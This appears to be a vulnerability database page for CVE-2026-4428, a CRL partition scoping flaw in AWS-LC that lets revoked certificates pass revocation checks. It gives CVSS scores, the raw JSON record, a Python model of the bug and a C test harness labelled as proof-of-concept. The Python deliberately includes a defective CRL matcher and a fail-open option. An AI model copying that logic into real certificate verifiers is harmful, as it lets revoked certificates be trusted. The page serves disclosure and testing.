Security Vulnerability Report
CVE-2026-4428 CVSS 7.4 HIGH

CVE-2026-4428

Published: 2026-03-19 21:17:14
Last Modified: 2026-03-20 13:39:46
Source: ff89ba41-3aa1-4d27-914a-91399e9639e5

Description

A logic error in CRL distribution point validation in AWS-LC before 1.71.0 causes partitioned CRLs to be incorrectly rejected as out of scope, which allows a revoked certificate to bypass certificate revocation checks.

To remediate this issue, users should upgrade to AWS-LC 1.71.0 or AWS-LC-FIPS 3.3.0.

Weakness: CWE-299 (Improper Check for Certificate Revocation)
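The failure class behind this advisory is easiest to see against the RFC 5280 (section 6.3.3, step b) scope rule: a partitioned CRL carries an IssuingDistributionPoint extension, and it is authoritative for a certificate only when one of its distribution point names matches one of the names in the certificate's CRLDistributionPoints extension. If a verifier wrongly treats a matching partition as out of scope, it finds no CRL that covers the certificate, and whether that becomes a bypass depends on what it does with "no in-scope CRL". The following Python is an added illustration written for this page, not AWS-LC code, and it does not reproduce the specific condition in AWS-LC (the page does not detail it). The `buggy_in_scope` matcher is a hypothetical stand-in that rejects every partitioned CRL; the issuer name, URLs, serial numbers and CRL contents are constructed sample data.

```python
# Added illustration (not AWS-LC code): RFC 5280 section 6.3.3 CRL scope
# matching for partitioned CRLs, with a fail-closed revocation decision.
from dataclasses import dataclass
from enum import Enum


class Status(Enum):
    GOOD = "good"
    REVOKED = "revoked"
    UNDETERMINED = "undetermined"  # no in-scope CRL was found


@dataclass(frozen=True)
class Cert:
    serial: int
    issuer: str
    is_ca: bool = False
    crl_dps: tuple = ()  # names from the CRLDistributionPoints extension


@dataclass(frozen=True)
class Crl:
    issuer: str
    revoked_serials: frozenset
    idp_dps: tuple = ()  # IssuingDistributionPoint names; () means a full CRL
    only_user_certs: bool = False
    only_ca_certs: bool = False


def crl_in_scope(cert: Cert, crl: Crl) -> bool:
    """Is this CRL authoritative for this certificate (RFC 5280 6.3.3 b)?"""
    if crl.issuer != cert.issuer:
        return False
    if crl.only_user_certs and cert.is_ca:
        return False
    if crl.only_ca_certs and not cert.is_ca:
        return False
    if not crl.idp_dps:
        return True  # full CRL: covers every certificate of this issuer
    # Partitioned CRL: one IDP name must match one of the certificate's
    # distribution point names; otherwise this CRL says nothing about it.
    return any(dp in cert.crl_dps for dp in crl.idp_dps)


def buggy_in_scope(cert: Cert, crl: Crl) -> bool:
    """Hypothetical defective matcher: every partitioned CRL is treated as
    out of scope. Models the failure class in the advisory, not AWS-LC's
    actual code path."""
    return crl.issuer == cert.issuer and not crl.idp_dps


def check_revocation(cert: Cert, crls, in_scope=crl_in_scope) -> Status:
    """Decide revocation from the CRLs that are in scope for the cert.
    With no in-scope CRL the answer is UNDETERMINED, never GOOD."""
    candidates = [crl for crl in crls if in_scope(cert, crl)]
    if not candidates:
        return Status.UNDETERMINED
    if any(cert.serial in crl.revoked_serials for crl in candidates):
        return Status.REVOKED
    return Status.GOOD


def verifier_accepts(status: Status, fail_open: bool = False) -> bool:
    """A path validator may accept only GOOD. Treating UNDETERMINED as
    acceptable (fail_open=True) is how a mis-scoped CRL becomes a bypass."""
    if status is Status.GOOD:
        return True
    if status is Status.UNDETERMINED:
        return fail_open
    return False


# Constructed sample data: an issuer that shards its CRL into partitions.
ISSUER = "CN=Example Issuing CA"
P7 = "http://crl.example.test/p7.crl"
P3 = "http://crl.example.test/p3.crl"
REVOKED_CERT = Cert(serial=0x1234, issuer=ISSUER, crl_dps=(P7,))
CRLS = (
    Crl(issuer=ISSUER, revoked_serials=frozenset({0x1234, 0x1235}), idp_dps=(P7,)),
    Crl(issuer=ISSUER, revoked_serials=frozenset({0x9999}), idp_dps=(P3,)),
)


def demo() -> dict:
    """Correct matcher finds partition p7 and reports REVOKED; the buggy
    matcher finds nothing, which a fail-open verifier turns into acceptance."""
    correct = check_revocation(REVOKED_CERT, CRLS)
    buggy = check_revocation(REVOKED_CERT, CRLS, in_scope=buggy_in_scope)
    return {
        "correct": correct,
        "buggy": buggy,
        "buggy_fail_closed": verifier_accepts(buggy),
        "buggy_fail_open": verifier_accepts(buggy, fail_open=True),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run it directly to see the four outcomes side by side. The point a practitioner should take from it: with `X509_V_FLAG_CRL_CHECK` style semantics the correct matcher yields "revoked", and even the defective matcher only yields a bypass when "no CRL covers this certificate" is allowed to pass; a verifier that fails closed on that case is left with a denial of service rather than an accepted revoked certificate.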

CVSS Details

CVSS v3.1 (CNA-supplied, type Secondary)
Score: 7.4 HIGH
Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
Exploitability 2.2, Impact 5.2

CVSS v4.0 (same source)
Score: 9.1 CRITICAL
Vector: CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

Both vectors rate attack complexity High, and the v4.0 vector adds Attack Requirements: Present. In practical terms an attacker needs a certificate that has actually been revoked by an issuer that publishes partitioned CRLs, and a target verifier built on a vulnerable AWS-LC that relies on those CRLs for revocation. Both scores come from the CNA; the record status is "Awaiting Analysis", so no NVD primary score exists yet.

Configurations (Affected Products)

No CPE configuration data is present in the source record. Affected versions, from the advisory description:

AWS-LC < 1.71.0
AWS-LC-FIPS < 3.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
#include <openssl/err.h>
#include <openssl/pem.h>
#include <openssl/x509.h>
#include <stdio.h>

/* Conceptual proof of concept for CVE-2026-4428: checks whether a revoked
 * certificate is accepted when the only CRL available is a partitioned one
 * (IssuingDistributionPoint extension present) that lists its serial number.
 * Expected inputs in the working directory:
 *   ca_cert.pem          issuing CA certificate (trust anchor)
 *   revoked_cert.pem     certificate issued by that CA and revoked
 *   partitioned_crl.pem  the CRL partition that covers the certificate's
 *                        CRL distribution point and lists its serial
 * Build against the AWS-LC under test, for example:
 *   cc poc.c -I<aws-lc>/include -L<aws-lc-build>/crypto -lcrypto -o poc
 */

static X509 *load_cert(const char *path) {
    FILE *fp = fopen(path, "r");
    if (fp == NULL) { perror(path); return NULL; }
    X509 *cert = PEM_read_X509(fp, NULL, NULL, NULL);
    fclose(fp);
    return cert;
}

static X509_CRL *load_crl(const char *path) {
    FILE *fp = fopen(path, "r");
    if (fp == NULL) { perror(path); return NULL; }
    X509_CRL *crl = PEM_read_X509_CRL(fp, NULL, NULL, NULL);
    fclose(fp);
    return crl;
}

int main(void) {
    printf("Testing CVE-2026-4428: AWS-LC CRL validation bypass\n");

    /* 1. Load the trust anchor, the revoked certificate and the partitioned
     *    CRL that contains the certificate's serial number. */
    X509 *ca = load_cert("ca_cert.pem");
    X509 *cert = load_cert("revoked_cert.pem");
    X509_CRL *crl = load_crl("partitioned_crl.pem");
    if (ca == NULL || cert == NULL || crl == NULL) {
        fprintf(stderr, "failed to load test inputs\n");
        return 2;
    }

    /* 2. Build a store holding the CA and the CRL, and require a CRL check
     *    for the leaf. Without the CA in the store the chain would fail for
     *    an unrelated reason and tell us nothing about CRL handling. */
    X509_STORE *store = X509_STORE_new();
    X509_STORE_add_cert(store, ca);
    X509_STORE_add_crl(store, crl);
    X509_STORE_set_flags(store, X509_V_FLAG_CRL_CHECK);

    X509_STORE_CTX *ctx = X509_STORE_CTX_new();
    X509_STORE_CTX_init(ctx, store, cert, NULL);

    /* 3. Verify. A fixed build (AWS-LC >= 1.71.0, AWS-LC-FIPS >= 3.3.0) must
     *    fail with "certificate revoked". Acceptance means the partition was
     *    not applied to the certificate. Read the error string on failure:
     *    "unable to get certificate CRL" also shows the partition was treated
     *    as out of scope, even though this single-CRL setup did not accept
     *    the certificate. */
    int result = X509_verify_cert(ctx);
    if (result == 1) {
        printf("[!] VULNERABILITY CONFIRMED: revoked certificate was accepted.\n");
    } else {
        int err = X509_STORE_CTX_get_error(ctx);
        printf("[+] Certificate rejected: %s\n", X509_verify_cert_error_string(err));
    }

    X509_STORE_CTX_free(ctx);
    X509_STORE_free(store);
    X509_CRL_free(crl);
    X509_free(cert);
    X509_free(ca);
    return result == 1 ? 1 : 0;
}

References

https://aws.amazon.com/security/security-bulletins/2026-010-AWS/ (AWS security bulletin)
https://github.com/aws/aws-lc/releases/tag/v1.71.0 (AWS-LC v1.71.0 release)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-4428", "sourceIdentifier": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "published": "2026-03-19T21:17:14.170", "lastModified": "2026-03-20T13:39:46.493", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A logic error in CRL distribution point validation in AWS-LC before 1.71.0 causes partitioned CRLs to be incorrectly rejected as out of scope, which allows a revoked certificate to bypass certificate revocation checks.\n\nTo remediate this issue, users should upgrade to AWS-LC 1.71.0 or AWS-LC-FIPS-3.3.0."}, {"lang": "es", "value": "Un error lógico en la validación del punto de distribución de CRL en AWS-LC anterior a 1.71.0 provoca que las CRL particionadas sean rechazadas incorrectamente por estar fuera de alcance, lo que permite que un certificado revocado eluda las comprobaciones de revocación de certificados.\n\nPara remediar este problema, los usuarios deben actualizar a AWS-LC 1.71.0 o AWS-LC-FIPS-3.3.0."}], "metrics": {"cvssMetricV40": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", 
"modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "ff89ba41-3aa1-4d27-914a-91399e9639e5", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-299"}]}], "references": [{"url": "https://aws.amazon.com/security/security-bulletins/2026-010-AWS/", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}, {"url": "https://github.com/aws/aws-lc/releases/tag/v1.71.0", "source": "ff89ba41-3aa1-4d27-914a-91399e9639e5"}]}}